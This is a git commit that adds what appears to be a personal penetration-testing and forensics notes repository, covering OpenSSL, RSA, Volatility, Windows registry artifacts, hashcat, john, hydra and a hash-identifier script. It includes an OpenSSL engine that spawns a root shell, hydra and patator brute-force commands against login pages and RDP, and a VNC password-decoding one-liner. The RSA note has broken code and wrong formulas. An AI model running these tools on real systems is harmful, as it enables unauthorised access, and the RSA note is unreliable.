further restructuring

2022-11-12 23:18:06 +01:00 · 2022-11-12 23:18:06 +01:00 · 996f65fa61
parent 980fdf6242
commit 996f65fa61
43 changed files with 2029 additions and 0 deletions
--- a/Cryptography/OpenSSL
+++ b/Cryptography/OpenSSL
@ -0,0 +1,44 @@
 # OpenSSL Engine
 * Hook external libs
 * [OpenSSL blog](https://www.openssl.org/blog/blog/2015/10/08/engine-building-lesson-1-a-minimum-useless-engine/)
 * Most minimal example
 ```C
 #include <openssl/engine.h>
 static int bind(ENGINE *e, const char *id)
 {
  return 1;
 }
 IMPLEMENT_DYNAMIC_BIND_FN(bind)
 IMPLEMENT_DYNAMIC_CHECK_FN()
 ```
 * Shell as root
 ```C
 #include <openssl/engine.h>
 #include <unistd.h>
 static int bind(ENGINE *e, const char *id)
 {
  setuid(0);
  setgid(0);
  system("/bin/bash");
 }
 IMPLEMENT_DYNAMIC_BIND_FN(bind)
 IMPLEMENT_DYNAMIC_CHECK_FN()
 ```
 * Compile
 ```C
 gcc -fPIC -o rootshell.o -c rootshell.c
 gcc -shared -o rootshell.so -c -lcrytpo rootshell.o
 ```
 * Execute via
 ```sh
 openssl engine -t `pwd`/rootshell.so
 ```
--- a/Cryptography/OpenSSL-Cheatsheet.md
+++ b/Cryptography/OpenSSL-Cheatsheet.md
@ -0,0 +1,23 @@
 # OpenSSL Cheatsheet
 ## Extract keys from PFX Cert
 * Key and cert form PFX
 ```sh
 openssl pkcs12 -in cert.pfx -nocerts -out key.pem -nodes
 openssl pkcs12 -in cert.pfx -out cert.pem -clcerts -nokeys
 ```
 ## Extract & Repack PFX Cert
 * Extract & Repack with another password, e.g. from `mimikatz` to `cqure`
 ```sh
 openssl pkcs12 -in *.pfx -out temp.pem -nodes
 openssl pkcs12 -export -out *.pfx -in temp.pem
 ```
 ## Generate Certificate
 ```sh
 openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes
 ```
--- a/Cryptography/RSA.md
+++ b/Cryptography/RSA.md
@ -0,0 +1,36 @@
 # RSA
 * `p * q = n`
 * Coprime Phi is calculated either by [Euler Totient](https://en.wikipedia.org/wiki/Euler's_totient_function) or [greatest common divisor](https://en.wikipedia.org/wiki/Greatest_common_divisor) via [euclidean algorithm](https://crypto.stanford.edu/pbc/notes/numbertheory/euclid.html) 
 * \\(1 < $\phi$ < n \\)
 * There is also $\phi$ = (p-1) * (q-1)
 * Encryption, public key `e` is a prime between 2 and phi  --> \\( 2 < e < $\phi$ \\)
 ```python
 possible_e = []
 for i in range (2, phi):
    if gcd(n, i) == 1 and gcd(phi, i) == 1:
        possible_e.append() 
 ```
 * Decryption, private key `d` --> \\( d * e mod $\phi$ = 1 \\)
 ```python
 possible_d = []
 for i in range (phi + 1, phi + foo):
    if i * e mod phi == 1 :
       possible_d.append()
 ```
 * \\( Cipher = msg ** d mod $\phi$ \\)
 * \\( Cleartext = cipher ** e mod $\phi$ ) 
 ## Euklid
 ```python
 def gcd(a, b):
    if b == 0:
        return a
    return gcd(b, a % b)
 ```
 ## Links
 * [Encryption+Decryption](https://www.cs.drexel.edu/~jpopyack/Courses/CSP/Fa17/notes/10.1_Cryptography/RSA_Express_EncryptDecrypt_v2.html)
--- a/Forensics/Kape.md
+++ b/Forensics/Kape.md
@ -0,0 +1,23 @@
 # Kroll Artifact Parser
 * Collect and processes artifacts on windows
 * Collects from live systems, mounted images and F-response tool
 ## Targets
 * Needs source and target directory, as well as a module to process the files on
 * `Target` copies a file into a repository
 * `*.tkape` files contains metadata of the files to copy
 * `Compound Targets` contain metadata of multiple files in order to get a result quicker
 * `!Disable` do not appear in the target list
 * `!Local` keep on local
 ## Modules
 * Used on the targeted files
 * `*.mkape` files
 * Additional binaries are kept in `bin`
--- a/Forensics/NTFS.md
+++ b/Forensics/NTFS.md
@ -0,0 +1,48 @@
 # NTFS
 * Has the following advantages over FAT
    * Journaling 
    * ACL
    * Volume Shadow Copy
    * Alternate Data Stream
 ## Master File Table
 * VBR references to `$MFT`
 * `$LOGFILE` stores transactions of the file system
 * `$UsnJrnl` changed files, and reason for change
 ## Caching
 * File information is cached for frequent use in 
 ```sh
 C:\Windows\Prefetch\*.pf
 ```
 * An SQLite database can be found under
 ```sh
 C:\Users\<username>\AppData\Local\ConnectedDevicesPlatform\{randomfolder}\ActivitiesCache.db
 ```
 ## Jumplist
 * Stores recently used files of applications inside the taskbar 
 ```sh
 C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations
 ```
 ## Shortcut Files
 ```sh
 C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\
 C:\Users\<username>\AppData\Roaming\Microsoft\Office\Recent\
 ```
 ## Internet Explorer History
 ```sh
 C:\Users\<username>\AppData\Local\Microsoft\Windows\WebCache\WebCacheV*.dat
 ```
 ## Removeable Device Setup Log
 ```sh
 C:\Windows\inf\setupapi.dev.log
 ```
--- a/Forensics/OLEtools.md
+++ b/Forensics/OLEtools.md
@ -0,0 +1,28 @@
 # oletools & Vmonkey
 * Analyze ooxml and ole2 files
 * [oletools repo](https://github.com/decalage2/oletools.git)
 ## Usage
 * Check content of a stream
 ```sh
 oledump.py file.doc  -Ss <No. of stream>
 oledump.py file.doc  -Ss <No. of stream> -v
 ```
 ```sh
 oledump.py -i file.doc
 ```
 ```sh
 olevba file.doc
 ```
 ## Vipermonkey
 * For the lazy ones
 ```sh
 vmonkey file.doc
 ```
 ## scdbg
 * [scdbg repo](https://github.com/dzzie/SCDBG.git)
--- a/Forensics/References.md
+++ b/Forensics/References.md
@ -0,0 +1,7 @@
 ## Forensics References
 ## Volatility
 [volatility](https://github.com/volatilityfoundation/volatility.git)
 [volatility3](https://github.com/volatilityfoundation/volatility3.git)
--- a/Forensics/Volatility.md
+++ b/Forensics/Volatility.md
@ -0,0 +1,91 @@
 # Volatility
 Search through collected volatile memory dumps, volume and VM images.
 Volatility and Volatility 3 have a different syntax. The older one has  
 higher malware hunting abilities.
 * [Cheat sheet](https://downloads.volatilityfoundation.org/releases/2.4/CheatSheet_v2.4.pdf)
 * [Hacktricks shee](https://book.hacktricks.xyz/forensics/volatility-examples)
 * [Symbol table for Linux and macOS](https://github.com/volatilityfoundation/volatility3#symbol-tables)
 ## Basic Commands
 * Basic Info, find OS profile
 ```sh
 volatility -f <file.iso> imageinfo
 volatility -f <file.iso> kdbgscan
 ```
 * Process list
 ```sh
 volatility -f <file.iso> --profile <OSprofile> pslist
 ```
 * List dlls
 ```sh
 volatility -f <file.iso> --profile <OSprofile> dlllist -p <PID>
 ```
 * Last accessed dir
 ```sh
 volatility -f <file.iso> --profile <OSprofile> shellbags
 ```
 ### Volatility3 
 * Basic Info works too, but you have to know the kind of OS anyway
 ```sh
 volatility -f <file.iso> windows.info
 ```
 * Process list, but processes can be hidden. Therefore use ` psscan `
 ```sh
 volatility -f <file.iso> windows.pslist
 volatility -f <file.iso> windows.psscan
 volatility -f <file.iso> windows.pstree
 ```
 * List dlls, this includes the path of the file
 ```sh
 volatility -f <file.iso> windows.dlllist
 ```
 * Find malicious files, fileless and including files, respectively
 ```sh
 volatility -f <file.iso> windows.malfind 
 volatility -f <file.iso> windows.vadyarascan
 ```
 * Dump memory map
 ```sh
 volatility -f <file.iso> windows.memmap.Memmap --pid <pid> --dump
 ```
 * Dump and scan files 
 ```sh
 windows.dumpfiles.DumpFiles   Dumps cached file contents from Windows memory
 windows.filescan.FileScan   Scans for file objects present in a particular windows. Lists version information from PE files.
 ```
 * Find file handles or mutex
 ```sh
 volatility -f <file.iso> windows.mutex
 ```
 * Malware hunting through hooking
 ```sh
 windows.ssdt.SSDT   Lists the system call table. # System Service Descriptor Table
 windows.driverirp.DriverIrp   List IRPs for drivers in a particular windows memory image.
 windows.modules.Modules   Lists the loaded kernel modules.
 windows.driverscan.DriverScan   Scans for drivers present in a particular windows
 ```
 ## Plugins 
 Volatility 3 plugins are named after the specific profile they are used for.   
 For the most part these are (` macOS.*, windows.*, linux.* `)
 * For example 
    * Truecryptpassphrase
    * cmdscan, command history
    * shutdowntime
--- a/Forensics/Windows
+++ b/Forensics/Windows
@ -0,0 +1,119 @@
 # Windows Registry
 ## Regedit Keys
 * HKEY_CURRENT_USER (HKCU), inside HKU
 * HKEY_USERS (HKU)
 * HKEY_LOCAL_MACHINE (HKLM)
 * HKEY_CLASSES_ROOT (HKCR), stored in HKLM and HKU
    * `HKEY_CURREN_USER\Software\Classes` for settings of interactive user
    * `HKEY_LOCAL_MACHINE\Software\Classes` to change default settings
 * HKEY_CURRENT_CONFIG
 ## Paths
 * `C:\Windows\System32\Config`
    * Default -> `HKEY_USERS\DEFAULT`
    * SAM -> `HKEY_LOCAL_MACHINE\SAM`
    * SECURITY -> `HKEY_LOCAL_MACHINE\Security`
    * SOFTWARE -> `HKEY_LOCAL_MACHINE\Software`
    * SYSTEM -> `HKEY_LOCAL_MACHINE\System`
 * `C:\Users\<username>\`
    * NTUSER.DAT -> `HKEY_CURRENT_USER` , hidden file
 * `C:\Users\<username>\AppData\Local\Microsoft\Windows`
    * USRCLASS.DAT -> `HKEY_CURRENT_USER\Sofware\CLASSES`, hidden file
 * `C:\Windows\AppCompat\Programs\Amcache.hve`
 ### Transaction Logs
 * Transaction `<name of registry hive>.LOG` of the registry hive
 * Saved inside the same directory which is `C:\Windows\System32\Config`, as the hive which was altered.
 ### Backups
 * Saved every ten days
 * Look out for recently deleted or modified keys
 * `C:\Windows\System32\Config\RegBack`
 ## Data Acquisition
 * Tools
    * [Autopsy](https://www.autopsy.com/)
    * [FTK Imager](https://www.exterro.com/ftk-imager), does not copy `Amcache.hve`
    * [KAPE](https://www.kroll.com/en/services/cyber-risk/incident-response-litigation-support/kroll-artifact-parser-extractor-kape), preserves directory tree
    * `Registry Viewer`
    * `Zimmerman's Registry Explorer`, uses transaction logs as well
        * ` AppCompatCache Parser`
    * `RegRipper`, cli and gui
 ## System Information
 * OS Version -> `SOFTWARE\Microsoft\Windows NT\CurrentVersion`
 * Computer Name -> `SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName`
 * Time Zone `SYSTEM\CurrentControlSet\Control\TimeZoneInformation`
 * Network Interfaces -> `SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces`
 * Past connected networks -> `SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged` and `SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed`
 * Services -> `SYSTEM\CurrentControlSet\Services`
    * Service will start at boot with `start` key value `0x02`
 * Users, SAM -> `SAM\Domains\Account\Users`
 ### Control Sets
 * `ControlSet001` -> last boot
 * `ControlSet002` -> last known good
 * `HKLM\SYSTEM\CurrentControlSet` -> live 
 * Can be found under:
    * `SYSTEM\Select\Current` shows the used control set
    * `SYSTEM\Select\LastKnownGood`
 ## Autostart Programs
 * `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`
 * `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce`
 * `SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce`
 * `SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run`
 * `SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
 ## Recent Files
 * `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`, e.g. xml, pdf, jpg
 * Office files -> `NTUSER.DAT\Software\Microsoft\Office\VERSION`, `NTUSER.DAT\Software\Microsoft\Office\15.0\Word`
 * Office 365 -> `NTUSER.DAT\Software\Microsoft\Office\VERSION\UserMRU\LiveID_####\FileMRU`
 ## ShellBags
 * `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\Bags`
 * `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU`
 * `NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU`
 * `NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags`
 ## Last Open/Saved/Visited Dialog MRUs
 * `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePIDlMRU`
 * `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU`
 ## Explorer Address/Search Bars
 * `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths`
 * `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery`
 ## User Assist
 * GUI applications launched by the user
 * `NTUSER.DAT\Software\Microsoft\Windows\Currentversion\Explorer\UserAssist\{GUID}\Count`
 ## Shim Cache
 * Application Compatibility, AppCompatCache
 * `SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache`
 * Use `AppCompatCacheParser.exe --csv <path to save output> -f <path to SYSTEM hive for data parsing> -c <control set to parse>`
 ### AmCache
 * Information about recently run applications on the system
 * `C:\Windows\appcompat\Programs\Amcache.hve`
 * Last executed app -> `Amcache.hve\Root\File\{Volume GUID}\`
 * Saves SHA1 of the last executed app
 ## Background Activity Monitor/Desktop Activity Moderator BAM/DAM
 * Saves full path of executed apps
 * `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}`
 * `SYSTEM\CurrentControlSet\Services\dam\UserSettings\{SID}`
 ## Devices
 * Identification
    * USB -> `SYSTEM\CurrentControlSet\Enum\USBTOR`, `SYSTEM\CurrentControlSet\Enum\USB`
 * Device name -> `SOFTWARE\Microsoft\Windows Portable Devices\Devices`
 * First time connected -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0064`
 * Last time connected -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0066`
 * Last removal time -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0067`
--- a/Forensics/iOS.md
+++ b/Forensics/iOS.md
@ -0,0 +1,32 @@
 # iOS Devices
 ## Trust Certificates
 * Exchanged between 'Trusted' devices and the charging iOS device.
 * iTunes access to the iOS device has elevated permissions using the cert.
 * Keychain may be extracted through iTunes.
 ## Interesting Files
 * `ResetCounter.plist`, hard Reset diagnostic counter
 * `com.apple.preferences.datetime.plist`
 * DB tables
    * Atendee
    * Task
    * Event
 * Mail
 * Safari
 * Cookies
 * Pictures
 * Addressbook
 * SMS
 * Voicemail
 * WiFi Keys
 ## Backups
 Encrypted and unencrypted backups can be chosen in the iTunes menu.
 ## Tools
 * [iFunbox](https://www.i-funbox.com/en/page-about-us.html)
 * [O.MG cable](https://shop.hak5.org/products/o-mg-cable)
--- a/Hashes/Bruteforce/Patator.md
+++ b/Hashes/Bruteforce/Patator.md
@ -0,0 +1,23 @@
 # Patator Bruteforcing
 * [Lanjelot's Repo](https://github.com/lanjelot/patator/)
 ## Modules
 * Available modules can be found under `patator --help`
 * Module specifics can be found via `patator <module> -h`
 ## Using a Module
 * For example `http_fuzz` can be used via
 ```sh
 TARGET_IP=10.0.47.11
 CSRF=$(curl -s -c stored.cookie "${IP}/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
 SESSION_ID=$(grep PHPSESSID stored.cookie | awk -F ' ' '{print $7}')
 echo "The CSRF is: $CSRF"
 echo "The PHPSESSID is: $SESSION_ID"
 patator.py http_fuzz method=POST --threads=64 timeout=10 url="http://${TARGET_IP}/login.php" 0=passwords.txt body="username=admin&password=FILE0&Login=Login&user_token=${CSRF}" header="Cookie: PHPSESSID=${SESSION_ID}; security=impossible" -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php' -x 
 ```
--- a/Hashes/Haiti.md
+++ b/Hashes/Haiti.md
@ -0,0 +1,6 @@
 # haiti
 * Hash Identifier
 ```sh
 haiti <hash>
 ```
--- a/Hashes/Hashcat.md
+++ b/Hashes/Hashcat.md
@ -0,0 +1,24 @@
 # Hashcat Utilities
 * [Modes](https://hashcat.net/wiki/doku.php?id=example_hashes)
 ## Wordlists
 * Combine wordlists
 ```sh
 combinator wordlist.txt otherwordlist.txt > newwordlist.txt
 ```
 * Create wordlist
 ```sh
 hashcat --force <input.txt> -r /opt/hashcat/rules/best64.rule --stdout > wordlist.txt
 ```
 ## Using Masks
 * A mask can be set instead of a wordlist, this charset is then brute forced by iterating the charset
 * [Masks](https://hashcat.net/wiki/doku.php?id=mask_attack)
 * Bruteforcing seven lowerspace characters using `SHA2-384` as an example  
 ```sh
 hashcat -m 10800 -a 3 hash.out ?l?l?l?l?l?l?l
 ```
--- a/Cracking/Hydra.md
+++ b/Cracking/Hydra.md
@ -0,0 +1,37 @@
 # Hydra usage
 ## Examples
 * HTTP post form
 ```sh
 hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
 ```
 * HTTP basic auth
 ```sh
 hydra -l bob -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 10.10.167.239 http-get /protected
 ```
 |Command|Description|
 |-------|-----------|
 |`hydra -P <wordlist> -v <ip> <protocol>`|Brute force against a protocol of your choice|
 |`hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol>`|You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)|
 |`hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>`|Attack a Windows Remote Desktop with a password list.|
 |`hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`|Craft a more specific request for Hydra to brute force.|
 ## Parameter
 |Option|Decription|
 |------|----------|
 |-l|Single username|
 |-P|Indicates use the following wordlist|
 |http-post-form|indicates the method|
 |/login url|the login URL|
 |:username|the form field where the username is entered|
 |^USER^|tells Hydra to use the username from -l|
 |password|the formfield where the password is entered|
 |^PASS^|tells Hydra to use the wordlist from -P|
 |Login|indicates to Hydra the login failed message|
 |Login failed|is the login failure message that the form returns|
 |F=incorrect|If this word appears on the page, login failed|
 |-V| verbose|
--- a/Hashes/Password
+++ b/Hashes/Password
@ -0,0 +1,43 @@
 # John The Ripper
 * [Formats](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
 # Usage 
 * Example
 ```sh
 john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=raw-sha256 --fork=2
 ```
 ## Declaring Structure
 * List subformat
 ```sh
 john --list=subformats
 ```
 ```sh
 john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=dynamic_85 --fork=2
 ```
 ## Rules
 * [Rule syntax](https://www.openwall.com/john/doc/RULES.shtml)
 * Create a local rules file, e.g. `/etc/john-local.conf` or `/usr/share/john/john-local.conf`
 * Create config for mutations, e.g. border mutation 
 ```sh
 [List.Rules:border]
 $[0-9]$[0-9]
 ```
 * Run john with parameter `--rules=border`
 ### Existing Rules
 * `l33t`, l33tsp34k
 * `NT`, case mutation
 * Example for `best64`
 ```sh
 john --wordlist=single_password.txt --rules=best64 --stdout > out.txt
 ```
 ### Subformats
 * Some salted passwords need dynamic rules
 ```sh
 john --list=subformats
 ```
--- a/Cracking/VNC.md
+++ b/Cracking/VNC.md
@ -0,0 +1,6 @@
 # VNC Password Decoding
 * Found passwords in vnc config files may be decoded via
 ```sh
 echo -n "<key>" | xxd -r -p |  openssl enc -des-cbc --nopad --nosalt -K 5AB2CDC0BADCAF13F1 -iv 0000000000000000 -d | hexdump -Cv
 ```
--- a/Cracking/sucrack.md
+++ b/Cracking/sucrack.md
@ -0,0 +1,8 @@
 # sucrack
 * [Repo](https://github.com/hemp3l/sucrack.git)
 * Upload to target and build
 ```sh
 sucrack -u <username> -w 100 <wordlist>
 ```
--- a/Hashes/References.md
+++ b/Hashes/References.md
@ -0,0 +1,19 @@
 # Hashes References
 ## Password and Username Generation
 [exrex](https://github.com/asciimoo/exrex.git)
 [namely](https://github.com/OrielOrielOriel/namely.git)
 ## Password Cracking
 [Colabcat](https://github.com/someshkar/colabcat.git)
 ## Default Passwords
 [default-password](https://default-password.info)
 [datarecovery](https://datarecovery.com/rd/default-passwords/)
 ## Wordlist Manager
 [wordlistctl](https://github.com/BlackArch/wordlistctl.git)
--- a/Hashes/Scripts/hash-id.py
+++ b/Hashes/Scripts/hash-id.py
@ -0,0 +1,592 @@
 #!/usr/bin/env python
 # encoding: utf-8
 # Hash Identifier
 # By Zion3R
 # www.Blackploit.com
 # Root@Blackploit.com
 from builtins import input
 from sys import argv, exit
 version = 1.2
 logo='''   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v'''+str(version)+''' #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################'''
 algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"}
 # hash.islower()  minusculas
 # hash.isdigit()  numerico
 # hash.isalpha()  letras
 # hash.isalnum()  alfanumerico
 def CRC16(hash):
    hs='4607'
    if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("101020")
 def CRC16CCITT(hash):
    hs='3d08'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("101040")
 def FCS16(hash):
    hs='0e5b'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("101060")
 def CRC32(hash):
    hs='b33fd057'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("102040")
 def ADLER32(hash):
    hs='0607cb42'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("102020")
 def CRC32B(hash):
    hs='b764a0d9'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("102060")
 def XOR32(hash):
    hs='0000003f'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("102080")
 def GHash323(hash):
    hs='80000000'
    if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("103040")
 def GHash325(hash):
    hs='85318985'
    if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("103020")
 def DESUnix(hash):
    hs='ZiY8YtDKXJwYQ'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False:
        jerar.append("104020")
 def MD5Half(hash):
    hs='ae11fd697ec92c7c'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("105060")
 def MD5Middle(hash):
    hs='7ec92c7c98de3fac'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("105040")
 def MySQL(hash):
    hs='63cea4673fd25f46'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("105020")
 def DomainCachedCredentials(hash):
    hs='f42005ec1afe77967cbc83dce1b4d714'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106025")
 def Haval128(hash):
    hs='d6e3ec49aa0f138a619f27609022df10'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106160")
 def Haval128HMAC(hash):
    hs='3ce8b0ffd75bc240fc7d967729cd6637'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106165")
 def MD2(hash):
    hs='08bbef4754d98806c373f2cd7d9a43c4'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106060")
 def MD2HMAC(hash):
    hs='4b61b72ead2b0eb0fa3b8a56556a6dca'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106120")
 def MD4(hash):
    hs='a2acde400e61410e79dacbdfc3413151'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106040")
 def MD4HMAC(hash):
    hs='6be20b66f2211fe937294c1c95d1cd4f'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106100")
 def MD5(hash):
    hs='ae11fd697ec92c7c98de3fac23aba525'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106020")
 def MD5HMAC(hash):
    hs='d57e43d2c7e397bf788f66541d6fdef9'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106080")
